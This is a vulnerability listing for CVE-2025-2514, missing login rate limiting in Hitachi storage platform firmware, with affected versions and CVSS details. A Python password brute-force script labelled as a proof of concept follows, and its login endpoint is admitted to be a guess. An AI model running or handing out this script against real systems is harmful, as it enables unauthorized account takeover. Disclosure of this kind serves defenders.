Security Vulnerability Report
CVE-2025-2514 CVSS 5.3 MEDIUM

Published: 2026-05-07 09:16:26
Last Modified: 2026-05-13 19:14:57

Description

Improper restriction of excessive authentication attempts vulnerability in Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28.

This issue affects Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28: before DKCMAIN Ver 88-08-16-xx/00, GUM Ver. 88-08-20/00, before DKCMAIN Ver 93-07-26-xx/00, GUM Ver. 93-07-26/00, before DKCMAIN Ver A3-04-02-xx/00, EMS Ver. A3-04-02/00, before DKCMAIN Ver A3-03-41-xx/00, EMS Ver. A3-03-41/00, before DKCMAIN Ver A3-03-03-xx/00, EMS Ver. A3-03-02/00.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hitachi:virtual_storage_one_block:23:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:virtual_storage_one_block:24:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:virtual_storage_one_block:26:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:virtual_storage_one_block:28:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hitachi:vsp_g130_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hitachi:vsp_g130:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hitachi:vsp_g150_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hitachi:vsp_g150:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hitachi:vsp_g350_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hitachi:vsp_g350:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hitachi:vsp_g370_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hitachi:vsp_g370:-:*:*:*:*:*:*:* - NOT VULNERABLE
Hitachi Virtual Storage Platform G series before DKCMAIN Ver 88-08-16-xx/00
Hitachi Virtual Storage Platform G series before DKCMAIN Ver 93-07-26-xx/00
Hitachi Virtual Storage Platform E series before DKCMAIN Ver A3-04-02-xx/00
Hitachi Virtual Storage Platform E series before DKCMAIN Ver A3-03-41-xx/00
Hitachi Virtual Storage Platform One Block before DKCMAIN Ver A3-03-03-xx/00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Disclaimer: This code is for educational purposes and security testing only.
# Do not use against systems without permission.


def brute_force_login(target_ip, username, password_list):
    """
    Simulates a brute force attack against a vulnerable login endpoint.
    Demonstrates the lack of rate limiting in CVE-2025-2514.
    """
    # Example endpoint, actual endpoint may vary based on product configuration
    target_url = f"https://{target_ip}/api/v1/login"
    headers = {
        "User-Agent": "CVE-2025-2514-Scanner",
        "Content-Type": "application/json"
    }

    print(f"[*] Starting brute force attempt on {target_url} for user: {username}")

    for password in password_list:
        payload = {
            "user": username,
            "pass": password
        }
        try:
            # In a real scenario, verify=False might be needed for self-signed certs
            response = requests.post(target_url, json=payload, headers=headers, timeout=5)

            # Check for successful login indicators (e.g., HTTP 200, specific token in response)
            if response.status_code == 200 and "token" in response.text:
                print(f"[+] SUCCESS: Valid password found -> {password}")
                return password
            else:
                print(f"[-] Failed: {password}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Connection error: {e}")
            break

    print("[*] Attack completed.")
    return None


# Example usage
if __name__ == "__main__":
    target = "192.168.1.100"
    user = "admin"
    passwords = ["admin", "password", "123456", "Hitachi@2024"]
    brute_force_login(target, user, passwords)
```

Raw JSON Data
